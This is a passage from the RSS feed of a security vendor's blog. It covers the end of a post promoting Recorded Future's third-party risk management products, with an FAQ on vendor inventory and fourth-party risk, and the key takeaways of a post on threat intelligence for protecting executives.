          <li>Detect compromised vendor access with <a href="https://www.recordedfuture.com/ko/products/identity-intelligence">Identity Intelligence</a> and automated revocation workflows.</li>
          <li>Map fourth-party dependencies and track concentration with <a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Third-Party Intelligence</a> risk scoring.</li>
          <li>Operationalize all of this via integrations to SIEM/SOAR/EDR and GRC/TPRM workflows (<a href="https://www.recordedfuture.com/ko/blog/servicenow-third-party-risk">e.g., ServiceNow</a>) so that risk evidence triggers action.</li>
        </ul>
        <p>Recorded Future is the only platform connecting disparate, live third-party intelligence into a single, real-time view that answers the question:</p>
        <p><em><strong>“Which of my vendors poses the greatest risk to my business—right now?”</strong></em></p>
        <p>Ready to replace point-in-time vendor questionnaires with continuous verification? Schedule a <a href="https://www.recordedfuture.com/ko/get-started#book-demo">personalized demo</a>, and our experts will show you how the Recorded Future platform provides a complete, real-time picture of your vendor ecosystem.</p>
        <div>
          <div>
            <div>
              <h2>FAQ</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the first step in creating a third-party risk management (TPRM) program?</h3>
              <p>The first step is inventory and categorization. You can't protect what you don't know you have. This involves creating a comprehensive inventory of all your third-party vendors, suppliers, and partners and then categorizing them based on their access to sensitive data and their criticality to your operations (e.g., "high," "medium," "low" risk).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the difference between third-party and fourth-party risk?</h3>
              <p>Third-party risk is the risk posed by your direct vendors (e.g., your SaaS provider, your payroll company). Fourth-party risk (or Nth-party risk) is the risk posed by your vendor's vendors. For example, if your SaaS provider hosts its application on a major cloud platform, that cloud platform is your fourth-party. The risk is cascaded up the supply chain and is often invisible to you without the right intelligence.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How often should we assess our third-party vendors?</h3>
              <p>High-risk vendors (those with access to critical data or vital to operations) should be assessed at least annually and continuously monitored in real-time. Traditional, "point-in-time" assessments (like questionnaires) are no longer sufficient, as a vendor's security posture can change overnight.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future help manage third-party risk more effectively?</h3>
              <p>Recorded Future's Third-Party Intelligence solution moves organizations beyond static, periodic assessments. It provides continuous, real-time intelligence by monitoring all your vendors for critical risk signals—like data breaches, malware infections, exposed credentials, attack surface vulnerabilities, and negative financial news—allowing you to prioritize and act on the most critical vendor risks before they become a breach.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How can I see risks from my vendors that are part of my own attack surface?</h3>
              <p>This is a critical connection. Recorded Future's Attack Surface Intelligence can be combined with Third-Party Intelligence to identify external-facing assets and vulnerabilities (e.g., services, open ports, vulnerable software) that belong to your third parties but are directly linked to your organization. This helps you understand exactly how a vendor's poor security hygiene directly exposes your own attack surface to an attacker.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1f932dac2f38bc9bc9592fb26c835aa00e1fe1df1.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[When the Digital World Turns Physical: The Expanding Role of Threat Intelligence in Executive Protection]]></title>
            <link>https://www.recordedfuture.com/ko/blog/digital-world-turns-physical-expanding-role-threat-intelligence-executive-protection</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/digital-world-turns-physical-expanding-role-threat-intelligence-executive-protection</guid>
            <pubDate>Mon, 08 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how converged threat intelligence protects executives from deepfakes, doxxing, and cyber-enabled physical threats with Recorded Future.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Takeaways</h2>
              <ul>
                <li><strong>Cyber and physical risks are converging.</strong> Online exposure now translates into real-world danger as doxxing, deepfakes, and business email compromise blur the boundary between the virtual and physical worlds.</li>
                <li><strong>Executives are prime targets.</strong> Their digital footprints, public visibility, and access to sensitive assets make them especially attractive to adversaries.</li>
              </ul>
              <ul>
                <li><strong>Threat intelligence can bridge the gap.</strong> Organizations are using social media monitoring, geopolitical analysis, and risk scoring to identify early indicators of harm against executives and employees.</li>
              </ul>
              <ul>
                <li><strong>Recorded Future enables proactive protection.</strong> By unifying physical and digital intelligence, security teams can detect threats earlier, contextualize risk, and safeguard leadership.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_12954aecdae677b3bfd16a2b689442a79b95f4b83.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
    </channel>
</rss>